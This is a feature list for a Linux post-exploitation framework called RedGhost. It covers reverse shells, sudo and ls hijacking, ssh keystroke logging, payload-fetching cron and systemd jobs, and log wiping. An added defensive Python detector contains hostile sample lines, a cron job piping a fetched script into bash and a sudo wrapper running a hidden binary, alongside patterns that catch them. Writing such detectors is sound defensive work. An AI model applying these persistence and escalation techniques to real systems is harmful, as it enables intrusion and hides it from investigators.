RedGhost: Linux post-exploitation framework
Linux post-exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.
- Payloads: generates various encoded reverse shells in netcat, bash, python, php, ruby and perl
- SudoInject: injects the "sudo" command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation
- lsInject: injects the "ls" command with a wrapper function that runs a payload every time "ls" is run, for persistence
- SSHKeyInject: logs the keystrokes of an ssh process using strace
- Crontab: creates a cron job that downloads a payload from a remote server and runs it every minute, for persistence
- SysTimer: creates a systemd timer that downloads and executes a payload every 30 seconds, for persistence
- GetRoot: tries various methods to escalate privileges
- Clearlogs: clears logs to make a forensic investigation difficult
- MassInfoGrab: grabs mass reconnaissance/information on a system
- CheckVM: checks whether the system is a virtual machine
- MemoryExec: executes a remote bash script in memory
- BanIp: bans an IP address using iptables
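The Crontab, SysTimer, SudoInject and lsInject behaviours above each leave a host artifact a defender can check for. The following is an added example, not part of RedGhost, that looks for those patterns in constructed samples of a user crontab, a systemd timer unit and a shell rc file; the sample contents, paths and the `payload.example` host are made up for the demonstration.

```python
"""Look for the persistence artifacts described in the feature list above.
All inputs below are constructed samples, not output from the tool."""
import re

# Constructed stand-ins for `crontab -l`, a .timer unit and ~/.bashrc
CRONTAB = """\
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * curl -s http://payload.example/p.sh | bash
"""
TIMER_UNIT = """\
[Unit]
Description=update checker
[Timer]
OnBootSec=10
OnUnitActiveSec=30
"""
BASHRC = """\
alias ll='ls -la'
sudo() { /tmp/.p >/dev/null 2>&1 & command sudo "$@"; }
"""

# download piped straight into a shell: curl/wget ... | sh or | bash
FETCH_EXEC = re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b')
# shell function definitions that shadow sudo or ls
WRAPPED_CMD = re.compile(r'^\s*(?:function\s+)?(sudo|ls)\s*\(\)\s*\{')


def suspicious_cron(text):
    """Every-minute jobs whose command downloads and executes (Crontab feature)."""
    hits = []
    for line in text.splitlines():
        fields = line.split(None, 5)  # five schedule fields + command
        if len(fields) == 6 and fields[:5] == ['*'] * 5 and FETCH_EXEC.search(fields[5]):
            hits.append(line)
    return hits


def short_interval_timer(text, max_seconds=60):
    """True when the unit re-fires at or below max_seconds (SysTimer uses 30s)."""
    m = re.search(r'^OnUnitActiveSec=(\d+)(?:s|sec)?\s*$', text, re.M)
    return bool(m) and int(m.group(1)) <= max_seconds


def wrapped_commands(text):
    """Names of sudo/ls wrapper functions defined in an rc file (SudoInject, lsInject)."""
    return [m.group(1) for m in map(WRAPPED_CMD.match, text.splitlines()) if m]
```

On a live host the same three checks would be fed `crontab -l` for each user, the contents of `/etc/cron.d`, the `.timer` units under `/etc/systemd/system`, and each user's shell rc files.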
Install
Requirements:
apt-get install dialog gcc iptables strace
Download and run:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
Source: https://github.com/d4rk007/